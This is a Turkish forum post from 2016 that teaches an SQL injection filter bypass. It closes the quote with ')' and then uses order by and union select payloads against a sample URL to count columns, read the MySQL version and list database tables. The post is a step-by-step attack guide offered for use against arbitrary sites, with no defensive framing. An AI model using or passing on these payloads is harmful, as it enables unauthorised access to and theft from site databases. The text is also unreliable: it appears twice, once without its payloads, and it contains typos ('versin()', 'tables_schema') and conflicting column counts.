- 17 Mar 2016
- 629
- 1
SQL İnjection Bypass Yöntemi ;
Merhaba arkadaşlar,
Bugün sizlere farklı bir bypass yönteminden bahsediyeceğim ")" yöntemine bakacağız.
site.com/index.php?id=1 sitemizde me ta-Karakterimizi koyarak deniyoruz hatamızı aldık evet çok güzel ikinci aşama olarak
"order by" işlemine geçiyoruz.
kodunu yazıyoruz ve sorgulatıyoruz fakat hiçbir sonuç yok farklı ifadeler ekliyoruz.
gibisinden ve ekranımıza hiçbir türlü değeri yansıtamıyoruz. Farklı bir bypass yöntemi olarak ilk başta şunu deniyoruz.
Evet işte hatamızı aldık istediğimiz sonuçlardan bir tanesi devam ediyoruz.
"Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1"
Şimdi başlamadan önce farklı bir türde olarak devam ediyoruz ve me ta-Karakterimizin yanına ")" ifadesini ekleyerek devam ediyoruz.
evet şimdi sıra ekranımıza yansıyacak olan değeri bulmak arıyoruz ve bulduk 10 diyelim değerimiz.
burada ekrana birşey gelmiyor ve anlıyoruz ki "9" kolon numaramızdır.
Şimdi işimiz "union select" komutunu uygulamak ;
şimdi kolon numaramızın ekrana yansıması için id değerimize "-" işaretini koyalım.
evet kolon numaramız 3 arkadaşlar.
dediğimiz taktirde ekranımıza versiyonu yansıttığı zaman tamamdır artık gerisi kolaydır.
dediğimiz
taktirde ekranımıza tüm herşeyi gösterecektir.
Gerisi artık sizde arkadaşlar. Kolay gelsin Vesselam..
Merhaba arkadaşlar,
Bugün sizlere farklı bir bypass yönteminden bahsediyeceğim ")" yöntemine bakacağız.
site.com/index.php?id=1 sitemizde me ta-Karakterimizi koyarak deniyoruz hatamızı aldık evet çok güzel ikinci aşama olarak
"order by" işlemine geçiyoruz.
Kod:
"site.com/index.php?id=1 order+by+10--+"
Kod:
"site.com/index.php?id=1 order+by+10--+"
"site.com/index.php?id=1 order+by+9--+"
"site.com/index.php?id=1 order+by+5--+"
"site.com/index.php?id=1 order+by+2--+"
Kod:
"site.com/index.php?id=1' order+by+2--+"
"Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1"
Şimdi başlamadan önce farklı bir türde olarak devam ediyoruz ve me ta-Karakterimizin yanına ")" ifadesini ekleyerek devam ediyoruz.
Kod:
"site.com/index.php?id=1')+order+by+2--+"
Kod:
"site.com/index.php?id=1')+order+by+10--+"
Şimdi işimiz "union select" komutunu uygulamak ;
Kod:
"site.com/index.php?id=1')+union+select+1,2,3,4,5,6,7,8,9"
Kod:
"site.com/index.php?id=-1')+union+select+1,2,3,4,5,6,7,8,9"
Kod:
"site.com/index.php?id=-1')+union+select+1,2,versin(),4,5,6,7,8,9"
Kod:
"site.com/index.php?id=-1')+union+select+1,2,group_concat(table_name),4,5,6,7,8,9+from+information_schema.tables+where+tables_schema=database()"
taktirde ekranımıza tüm herşeyi gösterecektir.
Gerisi artık sizde arkadaşlar. Kolay gelsin Vesselam..
Son düzenleme: